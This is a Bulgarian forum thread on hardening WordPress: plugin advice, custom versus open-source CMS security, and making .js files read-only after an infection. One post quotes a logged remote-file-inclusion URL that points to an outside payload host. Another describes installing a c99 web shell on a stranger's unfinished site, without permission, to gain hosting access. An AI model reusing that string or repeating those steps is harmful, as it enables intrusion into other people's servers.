Съобщение

Collapse
No announcement yet.

Да стегнем малко горкия, беззащитен Wordpress :)

Collapse
Това е важна тема.
X
X
  • Филтър
  • Период
  • Показване на
Clear All
нови коментари

  • #16
    За: Да стегнем малко горкия, беззащитен Wordpress

    Първоначално публикувано от Truden View Post
    Не е ли по-простичко да се инсталира разширението "Secure WordPress"?
    Не съм запознат с това разширение и не мога да коментирам. Аз за момента не искам да слагам допълнителни разширения. Колкото повече разширения, толкова повече неприятности .

    Коментар


    • #17
      За: Да стегнем малко горкия, беззащитен Wordpress

      Първоначално публикувано от scoobydoo View Post
      Не съм запознат с това разширение и не мога да коментирам. Аз за момента не искам да слагам допълнителни разширения. Колкото повече разширения, толкова повече неприятности .
      Аз ползвам "Secure WordPress" от доста време и досега не съм имал проблеми.
      Виждам опити за хакване с външен файл, нещо като (string: /wp-content/themes/моята_тема/_tbs.php?src=http://blogger.com.v2training.com.au/xcyb/xcyb.php), но досега всичките безуспешни.

      Коментар


      • #18
        За: Re: Да стегнем малко горкия, беззащитен Wordpress

        Първоначално публикувано от Ma57eR View Post
        Аз не съм много съгласен с твърдението, че къстъма е по-сигурен. За малък сайт може би, но не и за по-сериозни проекти.
        За мен не е възможно екип от хора (десетина да речем) да направят и защитят нещо толкова добре, колкото комюнити от десетки хиляди(да не кажа стотици хиляди) потребители, които съобщават за дадени бъгове, дупки и подобни. По-скоро проблемите идват от зле написани допълнителни функционалности за дадената система, които отварят дупки.

        Разликата идва от там, че за безплатните CMS, когато излезне експлойт, той се разпространява бързо в определени среди, че достига и до потребители, които не знаят какво точно правят, но повтарят дадени стъпки и пробиват дадена система.
        При къстъм система проблеми създават само разбиращи хора, които са решили да направят мръсотия.
        Cloxy имаше друго предвид, като каза, че по-сигурно от custom няма...

        Просто custom решението е писано самостоятелно и до сорс кода нямат достъп толкова много хора, че да откриват дупки. Не, че е невъзможно да има дупки в едно custom решение, но просто много по-трудно ще се открият, отколкото да седнеш и да разгледаш как работи кода и да ти дойде на ум, че тука може да се появи проблем при еди-каква си ситуация

        Коментар


        • #19
          Re: Да стегнем малко горкия, беззащитен Wordpress

          Съгласен съм с теб Вирос - написал съм го в последното изречение. Просто при къстъм може да се очакват атаки само от разбиращи от това хора, а не от всеки пъпчив тийн, решил да става "хакер"

          Коментар


          • #20
            За: Да стегнем малко горкия, беззащитен Wordpress

            За да напишеш custom защита, трябва да знаеш слабото място, което трябва да се защити, но ако го знаеш, ще го кажеш на Wordpress и те ще го оправят.
            Аз от години ползвам защита на админ файла си в Truden Web Site (http://truden.com/admin.php) но това не помага срещу инжекции в ДБ.
            Празни индекс файлове крият директориите от любопитни погледи, но не са пречка за хакване.
            Трябва защита срещу Bad Queries и за това си има разширения за WorPress.
            Ако те не работят, тогава сме обречени, до откриване на дупката и нейното запушване.

            Коментар


            • #21
              Re: За: Re: Да стегнем малко горкия, беззащитен Wordpress

              Първоначално публикувано от Virosss View Post
              Просто custom решението е писано самостоятелно и до сорс кода нямат достъп толкова много хора, че да откриват дупки. Не, че е невъзможно да има дупки в едно custom решение, но просто много по-трудно ще се открият, отколкото да седнеш и да разгледаш как работи кода и да ти дойде на ум, че тука може да се появи проблем при еди-каква си ситуация
              Аз съм на мнение, че една система ако е писана с мисъл и сигурността е била на дневен ред, тя няма хакване. При custom системите има по-голяма вероятност това да се случи, но не е гаранция, разбира се.

              Крайно не съм съгласен с това, че дадена система е уязвима, когато я използват много потребители и/или кодът и е отворен. Така говореха преди за Windows-а, сега и за WordPress. С това не мога да се съглася.

              Некадърно написания код си е некадърно написан. WordPress е живото доказателство за това. Всеки, разбиращ от програмиране, ще забележи елементарни пропуски в кода му. Лошото е, че в повечето случаи те са фундаментални, в смисъл, вече е късно да се оправят, защото нещо някъде ще спре да работи.

              И истинските експлойти не изтичат в мрежата, откривателите си ги пазят за себе си и не са чак толкова нагли. Те взимат малко и не се набиват на очи.

              Коментар


              • #22
                За: Re: Да стегнем малко горкия, беззащитен Wordpress

                Да ти покажа ли колко хора са репортнали JS вируса за WordPress 3.3.1 в техния форум и как това комюинити от стотици хиляди програмисти не си е направило труда да го запуши? Как е ме обедиш, че това комюнити ще поддържа дадена версия стабилна и защитета след като вече 4 месеца се дъвче един и същ проблем и никой от тях не го е фикснал. Какъв е комуникационния канал с тези стотици хиляди "програмисти" ? Ако ти хакнат къстъм система поне можеш да се съвржеш с тези 10 човека и те да ти пачнат експлойта, а в другия случай репортвате, репортвате и чакате да падне тавана. Между другото за тези, които ги е ударил JS вируса решението е: почистване и смяна на правата за .js файловете на (444 - само за четене). Под конзола става с една команда така, че тикет до съпорта върши работа и е по-малко инвазивно от това да го правите с FTP, особенно ако имате по30000 и нагоре файлове в акаунта си.

                Първоначално публикувано от Ma57eR View Post
                Аз не съм много съгласен с твърдението, че къстъма е по-сигурен. За малък сайт може би, но не и за по-сериозни проекти.
                За мен не е възможно екип от хора (десетина да речем) да направят и защитят нещо толкова добре, колкото комюнити от десетки хиляди(да не кажа стотици хиляди) потребители, които съобщават за дадени бъгове, дупки и подобни. По-скоро проблемите идват от зле написани допълнителни функционалности за дадената система, които отварят дупки.

                Разликата идва от там, че за безплатните CMS, когато излезне експлойт, той се разпространява бързо в определени среди, че достига и до потребители, които не знаят какво точно правят, но повтарят дадени стъпки и пробиват дадена система.
                При къстъм система проблеми създават само разбиращи хора, които са решили да направят мръсотия.

                Коментар


                • #23
                  За: Да стегнем малко горкия, беззащитен Wordpress

                  Cloxy и съм склонен да се съглася и не съвсем...
                  Да прав си, че кадърно написаното си е кадърно написано, но в случая много по-лесно е да откриеш дупка, ако имаш сорс кода.. Практически е много трудно човек да предвиди всички сценарии и от там понякога изкачат проблемите.

                  Въпреки всичко голям % от хакванията са от небрежност на потребителите, щото просто не знаят как да се пазят. Обикновено след като се появи информация за сериозна дупка, се намират поне няколко теми в които се описва как да я фикснеш и т.н. За пример преди 2 дена попаднах на сайт на който беше инсталиран WP на субдомейн. На основният беше сложен WP, но не беше инсталиран. За пробата го инсталирах с външна db, ъплоаднах си c99 шел( за по-лесна работа ) с разширение за снимка... следва команда за промяна на разширението на .php, отворих си шела и вече имах почти пълен достъп до сайтовете на хостинга, включително и данните за локалното db и спомойно можех да си сменя паролата и да си скрия 2-3 линк-а... е от тогава се опитвам да се свържа с собственика да го предупредя за проблема и да си го оправи, щото не ми се мисли колко поразия може да му направи някой, буквално за секунди.

                  Ето един прекрасен пример, как човек сам застрашава сайтовете си... така, че колкото и да е перфектно написана една система, ако не знаеш как да я настроиш и да я подсигуриш и господ не може да ти помогне.

                  Коментар


                  • #24
                    За: Да стегнем малко горкия, беззащитен Wordpress

                    Ето ТУК Суперхостинг са описали няколко начина за защита на wp!Явно този пропуск на WordPress в защита е опарило доста хора включително и мен

                    Коментар


                    • #25
                      Re: За: Re: Да стегнем малко горкия, беззащитен Wordpress

                      Първоначално публикувано от s1yf0x View Post
                      Да ти покажа ли колко хора са репортнали JS вируса за WordPress 3.3.1 в техния форум и как това комюинити от стотици хиляди програмисти не си е направило труда да го запуши? Как е ме обедиш, че това комюнити ще поддържа дадена версия стабилна и защитета след като вече 4 месеца се дъвче един и същ проблем и никой от тях не го е фикснал. Какъв е комуникационния канал с тези стотици хиляди "програмисти" ? Ако ти хакнат къстъм система поне можеш да се съвржеш с тези 10 човека и те да ти пачнат експлойта, а в другия случай репортвате, репортвате и чакате да падне тавана. Между другото за тези, които ги е ударил JS вируса решението е: почистване и смяна на правата за .js файловете на (444 - само за четене). Под конзола става с една команда така, че тикет до съпорта върши работа и е по-малко инвазивно от това да го правите с FTP, особенно ако имате по30000 и нагоре файлове в акаунта си.
                      Разбрал си ме донякъде погрешно - под Комюнити не съм имал предвид програмисти, а потребители, които репортват. Това, че създателите все още не са предприели никакви мерки, говори лошо за тях като цяло. Никой в нищо не искам да убеждавам, а изказвам собственото си мнение
                      Масова смяна на правата може да се прави и с доста от FTP клиентите.
                      А и като цяло визирах CMS-ите, не само Wordpress. Лично не го ползвам - една две инсталации съм правил до момента - за проба на един-два плъгина и за редизайн на един шаблон.
                      Имам доста по-голям опит с Joomla и там е имало случаи да се изкарват версии буквално през 2-3 дена, защото е открита слабост.

                      Като цяло, непробиваема защита няма.

                      Коментар


                      • #26
                        Re: За: Re: Да стегнем малко горкия, беззащитен Wordpress

                        Първоначално публикувано от s1yf0x View Post
                        .... Между другото за тези, които ги е ударил JS вируса решението е: почистване и смяна на правата за .js файловете на (444 - само за четене).....
                        Имаш в предвид ВСИЧКИ .js файлове да се направят само за четене???

                        Коментар


                        • #27
                          За: Re: За: Re: Да стегнем малко горкия, беззащитен Wordpress

                          Да, тъй като заразяването става в различни .js файлове - горе долу на който попадне.
                          Първоначално публикувано от bulram View Post
                          Имаш в предвид ВСИЧКИ .js файлове да се направят само за четене???

                          Коментар


                          • #28
                            За: Да стегнем малко горкия, беззащитен Wordpress

                            Това с js файловете бихте ли го препоръчали на всеки потребител да си го направи? В смисъл, ще има ли някакви негативни последствия? Примерно да не може да се редактират такива файлове през админ панела или да не работят някои плъгини?

                            Коментар


                            • #29
                              За: Да стегнем малко горкия, беззащитен Wordpress

                              Не би трябвало да е проблем

                              Коментар


                              • #30
                                За: Да стегнем малко горкия, беззащитен Wordpress

                                Първоначално публикувано от scoobydoo View Post
                                Това с js файловете бихте ли го препоръчали на всеки потребител да си го направи? В смисъл, ще има ли някакви негативни последствия? Примерно да не може да се редактират такива файлове през админ панела или да не работят някои плъгини?
                                Мъка ще е като се ъпдейтва плъгин или вп-то - ще трябва да им разрешаваш писането всеки път ... изобщо... мъка мъка...

                                Коментар

                                Изчакайте...
                                X